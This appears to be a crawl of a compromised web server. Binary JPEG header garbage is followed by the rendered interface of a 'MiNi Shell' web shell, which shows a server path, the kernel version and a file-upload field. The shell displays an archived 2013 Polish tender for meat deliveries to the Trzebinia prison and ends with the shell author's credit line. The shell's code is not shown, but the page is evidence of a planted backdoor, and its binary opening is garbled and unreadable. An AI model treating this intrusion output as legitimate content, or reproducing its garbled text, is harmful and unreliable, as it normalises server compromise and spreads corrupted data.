JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130516/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130516/191316-N-2013.html

<p class="kh_header"><b>Trzebinia: Sukcesywne dostawy mięsa i produktów mięsnych dla potrzeb Zakładu Karnego w Trzebini</b><br>
<b>Numer ogłoszenia: 191316 - 2013; data zamieszczenia: 16.05.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Karny w Trzebini , ul. Słowackiego 70, 32-540 Trzebinia, woj. małopolskie, tel. 032 6121374 w. 45, faks 032 6121551.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sw.gov.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> Nie dotyczy niniejszego postępowania o udzielenie zamówienia.</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka organizacyjna Służby Więziennej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sukcesywne dostawy mięsa i produktów mięsnych dla potrzeb Zakładu Karnego w Trzebini.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia (artykuły żywnościowe) są sukcesywne dostawy mięsa i produktów mięsnych dla  potrzeb Zakładu Karnego w Trzebini.

2.Przedmiot zamówienia (artykuły żywnościowe) winien być wcześniej odpowiednio posortowany przez wykonawcę i odpowiadać wymaganiom jakościowym stawianym przez Polską Normę, normy unijne oraz spełniać obowiązujące w tym zakresie normy sanitarno-epidemiologiczne, a także winien być przechowywany w siedzibie wykonawcy w warunkach gwarantujących najwyższą jakość.

3.Dostarczone przedmioty zamówienia (artykuły żywnościowe) muszą być oznakowane zgodnie z obowiązującymi w tym zakresie przepisami (nazwa producenta, termin przydatności do spożycia, warunki przechowywania, itp.).

4.Przedmiot zamówienia (artykuły żywnościowe) obejmuje: 

Mięso i produkty mięsne
nomenklatura CPV: 15100000-9

1)boczek wędzony - ilość: 730 kg
minimalny termin przydatności do spożycia 96 godz. od daty dostawy	

2)podgardle wędzone - ilość: 730 kg
minimalny termin przydatności do spożycia 96 godz. od daty dostawy	

3)kości wędzone - ilość: 730 kg
minimalny termin przydatności do spożycia 96 godz. od daty dostawy	

4)porcje drobiowe rosołowe - ilość: 730 kg
minimalny termin przydatności do spożycia 96 godz. od daty dostawy	

5)pasztet cielęcy - ilość: 170 kg
minimalny termin przydatności do spożycia 72 godz. od daty dostawy
-artykuł wyprodukowany wyłącznie z mięsa cielęcego, bez dodatków w postaci przypraw, warzyw i grzybów

6)parówki cielęce - ilość: 170 kg
minimalny termin przydatności do spożycia 72 godz. od daty dostawy
-artykuł wyprodukowany wyłącznie z mięsa cielęcego, bez dodatków w postaci przypraw, warzyw i grzybów

7)polędwica drobiowa - ilość: 170 kg
minimalny termin przydatności do spożycia 72 godz. od daty dostawy
-artykuł wyprodukowany wyłącznie z mięsa drobiowego, bez dodatków w postaci przypraw, warzyw i grzybów

8)szynka drobiowa - ilość: 170 kg
minimalny termin przydatności do spożycia 72 godz. od daty dostawy
-artykuł wyprodukowany wyłącznie z mięsa drobiowego, bez dodatków w postaci przypraw, warzyw i grzybów

9)baleron drobiowy - ilość: 170 kg
minimalny termin przydatności do spożycia 72 godz. od daty dostawy
-artykuł wyprodukowany wyłącznie z mięsa drobiowego, bez dodatków w postaci przypraw, warzyw i grzybów

10)kiełbasa drobiowa - ilość: 170 kg
minimalny termin przydatności do spożycia 72 godz. od daty dostawy
-artykuł wyprodukowany wyłącznie z mięsa drobiowego, bez dodatków w postaci przypraw, warzyw i grzybów

11)kabanos drobiowy - ilość: 170 kg
minimalny termin przydatności do spożycia 72 godz. od daty dostawy
-artykuł wyprodukowany wyłącznie z mięsa drobiowego, bez dodatków w postaci przypraw, warzyw i grzybów

12)parówki wieprzowe cienkie - ilość: 790 kg
minimalny termin przydatności do spożycia 72 godz. od daty dostawy

13)parówki drobiowe cienkie - ilość: 790 kg
minimalny termin przydatności do spożycia 72 godz. od daty dostawy

14)pasztetowa wieprzowa - ilość: 790 kg
minimalny termin przydatności do spożycia 72 godz. od daty dostawy

15)pasztetowa drobiowa - ilość: 790 kg
minimalny termin przydatności do spożycia 72 godz. od daty dostawy

16)salceson wieprzowy włoski - ilość: 790 kg
minimalny termin przydatności do spożycia 72 godz. od daty dostawy

17)salceson wieprzowy brunszwicki - ilość: 790 kg
minimalny termin przydatności do spożycia 72 godz. od daty dostawy

18)mielonka wieprzowa - ilość: 790 kg
minimalny termin przydatności do spożycia 72 godz. od daty dostawy

19)mielonka drobiowa - ilość: 790 kg
minimalny termin przydatności do spożycia 72 godz. od daty dostawy

20)kiełbasa wieprzowa mortadela - ilość: 790 kg
minimalny termin przydatności do spożycia 72 godz. od daty dostawy

21)kiełbasa wieprzowa zwyczajna - ilość: 790 kg
minimalny termin przydatności do spożycia 72 godz. od daty dostawy

22)kiełbasa wieprzowa kanapkowa - ilość: 790 kg
minimalny termin przydatności do spożycia 72 godz. od daty dostawy

23)kiełbasa wieprzowa lunszmit - ilość: 790 kg
minimalny termin przydatności do spożycia 72 godz. od daty dostawy

24)kiełbasa wieprzowa regionalna - ilość: 790 kg
minimalny termin przydatności do spożycia 72 godz. od daty dostawy

25)kiełbasa wieprzowa węgierska - ilość: 790 kg
minimalny termin przydatności do spożycia 72 godz. od daty dostawy

26)mięso drobiowe gulaszowe - ilość: 730 kg 
minimalny termin przydatności do spożycia 96 godz. od daty dostawy	
-mięso drobiowe bez kości, bez tłuszczu zewnętrznego wraz z przylegającą do mięśni tkanką łączną, bez skórek, chrząstek oraz niejadalnych ścięgien i powięzi 
-mięso czyste, bez śladów zanieczyszczeń, zapach swoisty, charakterystyczny dla mięsa, bez oznak zaparzenia i rozpoczynającego się psucia

27)mięso wieprzowe gulaszowe - ilość: 730 kg 
minimalny termin przydatności do spożycia 96 godz. od daty dostawy	
-mięso wieprzowe bez kości, bez tłuszczu zewnętrznego wraz z przylegającą do mięśni tkanką łączną, bez skórek, chrząstek oraz niejadalnych ścięgien i powięzi 
-mięso czyste, bez śladów zanieczyszczeń, zapach swoisty, charakterystyczny dla mięsa, bez oznak zaparzenia i rozpoczynającego się psucia

28)mięso mielone drobiowe - ilość: 730 kg 
-pakowane w opakowaniu w map
minimalny termin przydatności do spożycia 96 godz. od daty dostawy
-mięso drobiowe robione w wilku przez siatkę o średnicy oczek od 2 mm do 5 mm, równomiernie wymieszane 
-mięso czyste, bez śladów zanieczyszczeń, zapach swoisty, charakterystyczny dla mięsa, bez oznak zaparzenia i rozpoczynającego się psucia

29)mięso mielone wieprzowe - ilość: 730 kg 
-pakowane w opakowaniu w map
minimalny termin przydatności do spożycia 96 godz. od daty dostawy
-mięso wieprzowe robione w wilku przez siatkę o średnicy oczek od 2 mm do 5 mm, równomiernie wymieszane 
-mięso czyste, bez śladów zanieczyszczeń, zapach swoisty, charakterystyczny dla mięsa, bez oznak zaparzenia i rozpoczynającego się psucia 
	 
30)schab wieprzowy z kością - ilość: 730 kg 
minimalny termin przydatności do spożycia 96 godz. od daty dostawy	

31)schab wieprzowy bez kości - ilość: 730 kg 
minimalny termin przydatności do spożycia 96 godz. od daty dostawy	

32)łopatka wieprzowa z kością - ilość: 730 kg
minimalny termin przydatności do spożycia 96 godz. od daty dostawy	

33)łopatka wieprzowa bez kości - ilość: 730 kg
minimalny termin przydatności do spożycia 96 godz. od daty dostawy

34)karczek wieprzowy z kością - ilość: 730 kg
minimalny termin przydatności do spożycia 96 godz. od daty dostawy	

35)karczek wieprzowy bez kości - ilość: 730 kg
minimalny termin przydatności do spożycia 96 godz. od daty dostawy	

36)mięso wieprzowe od szynki z kością - ilość: 730 kg
minimalny termin przydatności do spożycia 96 godz. od daty dostawy	

37)mięso wieprzowe od szynki bez kości - ilość: 730 kg
minimalny termin przydatności do spożycia 96 godz. od daty dostawy	

38)kaszanka wieprzowa - ilość: 730 kg 
minimalny termin przydatności do spożycia 96 godz. od daty dostawy	

39)wątroba wieprzowa - ilość: 730 kg 
minimalny termin przydatności do spożycia 96 godz. od daty dostawy	

40)ćwiartka tylna świeża z kurczaka - ilość: 730 kg
minimalny termin przydatności do spożycia 96 godz. od daty dostawy	

41)filet z piersi kurczaka świeży - ilość: 730 kg 
minimalny termin przydatności do spożycia 96 godz. od daty dostawy	

42)wątróbka drobiowa - ilość: 730 kg
minimalny termin przydatności do spożycia 96 godz. od daty dostawy

43)żołądki drobiowe - ilość: 730 kg
minimalny termin przydatności do spożycia 96 godz. od daty dostawy	

44)serduszka drobiowe - ilość: 730 kg
minimalny termin przydatności do spożycia 96 godz. od daty dostawy	

45)flaki wołowe gotowane - ilość: 730 kg
minimalny termin przydatności do spożycia 96 godz. od daty dostawy

5.Ofertę należy składać na całość przedmiotu zamówienia. Wymagane są wszystkie wyszczególnione artykuły żywnościowe.   

6.Podane w pkt 4 niniejszej specyfikacji ilości artykułów żywnościowych są szacunkowe i w czasie obowiązywania umowy mogą ulec zmianie. Zamawiający w zależności od ilości osadzonych oraz wysokości stawki żywieniowej przypadającej na jednego osadzonego, zastrzega sobie prawo zmniejszenia lub zwiększenia ilości poszczególnych artykułów żywnościowych.

7.W sytuacji odmiennego nazewnictwa poszczególnych artykułów żywnościowych, zamawiający dopuszcza możliwość zastosowania nazw własnych (firmowych) producenta, ale wyłącznie wtedy, kiedy wykonawca nie sprzedaje artykułu żywnościowego o wyżej wymienionej nazwie, a oferowany przez niego wyrób jest z nim tożsamy w procesie produkcji, składu, grupy technologicznej oraz odpowiada danej normie.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy niniejszego postępowania o udzielenie zamówienia</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu zgodnie z art. 22 ust. 1 ustawy Pzp, który stanowi załącznik nr 2 do niniejszej specyfikacji. Oświadczenie winno być złożone w oryginale.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu zgodnie z art. 22 ust. 1 ustawy Pzp, który stanowi załącznik nr 2 do niniejszej specyfikacji. Oświadczenie winno być złożone w oryginale.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu zgodnie z art. 22 ust. 1 ustawy Pzp, który stanowi załącznik nr 2 do niniejszej specyfikacji. Oświadczenie winno być złożone w oryginale.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu zgodnie z art. 22 ust. 1 ustawy Pzp, który stanowi załącznik nr 2 do niniejszej specyfikacji. Oświadczenie winno być złożone w oryginale.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu zgodnie z art. 22 ust. 1 ustawy Pzp, który stanowi załącznik nr 2 do niniejszej specyfikacji. Oświadczenie winno być złożone w oryginale.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Złożenie przez wykonawcę druku formularza ofertowego, który stanowi załącznik nr 1 do niniejszej specyfikacji. Formularz ofertowy winien być złożony w oryginale.

2.Jeżeli oferta zostanie podpisana przez pełnomocnika lub upoważnionego przedstawiciela wykonawcy należy dołączyć pełnomocnictwo lub upoważnienie (np. aktualny odpis z KRS ).

Pełnomocnictwo lub upoważnienie winno być złożone w oryginale lub kopii poświadczonej za zgodność z oryginałem przez wykonawcę.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W myśl art. 144 ust. 1 ustawy Pzp treść umowy może być zmieniona w stosunku do treści złożonych ofert w przypadkach wymienionych poniżej:

a)zmiany wynikające z okoliczności, których nie można było przewidzieć w dniu zawarcia umów, a są one korzystne dla zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zp.sw.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dział Kwatermistrzowski
Zakład Karny w Trzebini
ul. Słowackiego 70
32-540 Trzebinia.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.05.2013 godzina 08:30, miejsce: Sekretariat
Zakład Karny w Trzebini
ul. Słowackiego 70
32-540 Trzebinia.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy niniejszego postępowania o udzielenie zamówienia.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com